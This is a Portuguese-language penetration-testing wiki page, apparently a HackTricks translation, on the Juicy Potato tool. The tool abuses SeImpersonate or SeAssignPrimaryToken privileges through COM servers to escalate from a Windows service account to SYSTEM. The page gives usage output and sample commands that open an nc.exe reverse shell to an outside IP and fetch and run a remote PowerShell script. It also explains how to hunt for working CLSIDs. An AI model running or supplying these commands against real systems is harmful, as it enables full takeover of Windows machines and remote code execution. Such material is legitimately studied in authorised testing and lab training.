WhiteIntel

WhiteIntel é um mecanismo de busca alimentado pela dark web que oferece funcionalidades gratuitas para verificar se uma empresa ou seus clientes foram comprometidos por malwares de roubo.

O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.

Você pode verificar o site deles e experimentar o mecanismo de busca de forma gratuita em:

WhiteIntel

Juicy Potato (abusando dos privilégios dourados)

Uma versão açucarada do RottenPotatoNG, com um pouco de suco, ou seja, outra ferramenta de Escalada de Privilégios Locais, de Contas de Serviço do Windows para NT AUTHORITY\SYSTEM

Você pode baixar o juicypotato em https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts

Resumo

Do Readme do juicy-potato:

RottenPotatoNG e suas variantes alavancam a cadeia de escalada de privilégios com base no serviço BITS service tendo o ouvinte MiTM em 127.0.0.1:6666 e quando você tem privilégios SeImpersonate ou SeAssignPrimaryToken. Durante uma revisão de compilação do Windows, encontramos uma configuração onde o BITS foi intencionalmente desativado e a porta 6666 foi usada.

Decidimos tornar RottenPotatoNG em uma arma: Dê as boas-vindas ao Juicy Potato.

Para a teoria, veja Rotten Potato - Escalada de Privilégios de Contas de Serviço para SYSTEM e siga a cadeia de links e referências.

Descobrimos que, além do BITS, existem vários servidores COM que podemos abusar. Eles só precisam:

1. ser instanciáveis pelo usuário atual, normalmente um "usuário de serviço" que possui privilégios de impersonação

2. implementar a interface IMarshal

3. ser executados como um usuário elevado (SYSTEM, Administrador, ...)

Após alguns testes, obtivemos e testamos uma extensa lista de CLSID's interessantes em várias versões do Windows.

Detalhes suculentos

JuicyPotato permite que você:

• CLSID de Destino escolha qualquer CLSID que desejar. Aqui você pode encontrar a lista organizada por SO.

• Porta de Escuta COM defina a porta de escuta COM que preferir (em vez do 6666 codificado por padrão)

• Endereço IP de Escuta COM vincule o servidor a qualquer IP

• Modo de Criação de Processo dependendo dos privilégios do usuário que está sendo impersonado, você pode escolher entre:

• CreateProcessWithToken (necessita de SeImpersonate)

• CreateProcessAsUser (necessita de SeAssignPrimaryToken)

• ambos

• Processo a ser iniciado inicie um executável ou script se a exploração for bem-sucedida

• Argumento do Processo personalize os argumentos do processo iniciado

• Endereço do Servidor RPC para uma abordagem furtiva, você pode autenticar-se em um servidor RPC externo

• Porta do Servidor RPC útil se você deseja autenticar-se em um servidor externo e o firewall está bloqueando a porta 135...

• Modo de TESTE principalmente para fins de teste, ou seja, testar CLSIDs. Ele cria o DCOM e imprime o usuário do token. Veja aqui para testar

Utilização

T:\>JuicyPotato.exe
JuicyPotato v0.1

Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port


Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)

Pensamentos Finais

Do Readme do juicy-potato:

Se o usuário tiver privilégios SeImpersonate ou SeAssignPrimaryToken, então você é SYSTEM.

É quase impossível prevenir o abuso de todos esses Servidores COM. Você poderia pensar em modificar as permissões desses objetos via DCOMCNFG, mas boa sorte, isso será desafiador.

A solução atual é proteger contas sensíveis e aplicativos que são executados sob as contas * SERVICE. Parar o DCOM certamente inibiria esse exploit, mas poderia ter um impacto sério no sistema operacional subjacente.

De: http://ohpe.it/juicy-potato/

Exemplos

Nota: Visite esta página para obter uma lista de CLSIDs para tentar.

Obter um shell reverso com nc.exe

c:\Users\Public>JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

c:\Users\Public>

Powershell reverso

.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *

Iniciar um novo CMD (se tiver acesso RDP)

Problemas com CLSID

Muitas vezes, o CLSID padrão que o JuicyPotato usa não funciona e o exploit falha. Geralmente, são necessárias várias tentativas para encontrar um CLSID funcional. Para obter uma lista de CLSIDs para tentar em um sistema operacional específico, você deve visitar esta página:

Verificando CLSIDs

Primeiro, você precisará de alguns executáveis além do juicypotato.exe.

Baixe Join-Object.ps1 e carregue-o em sua sessão PS, e baixe e execute GetCLSID.ps1. Esse script criará uma lista de CLSIDs possíveis para testar.

Em seguida, baixe test_clsid.bat (altere o caminho para a lista de CLSID e para o executável juicypotato) e execute-o. Ele começará a tentar cada CLSID e quando o número da porta mudar, significará que o CLSID funcionou.

Verifique os CLSIDs funcionais usando o parâmetro -c

Referências

• https://github.com/ohpe/juicy-potato/blob/master/README.md

WhiteIntel

WhiteIntel é um mecanismo de busca alimentado pela dark web que oferece funcionalidades gratuitas para verificar se uma empresa ou seus clientes foram comprometidos por malwares roubadores.

O principal objetivo do WhiteIntel é combater a apropriação de contas e ataques de ransomware resultantes de malwares que roubam informações.

Você pode verificar o site deles e experimentar o mecanismo de busca de forma gratuita em:

WhiteIntel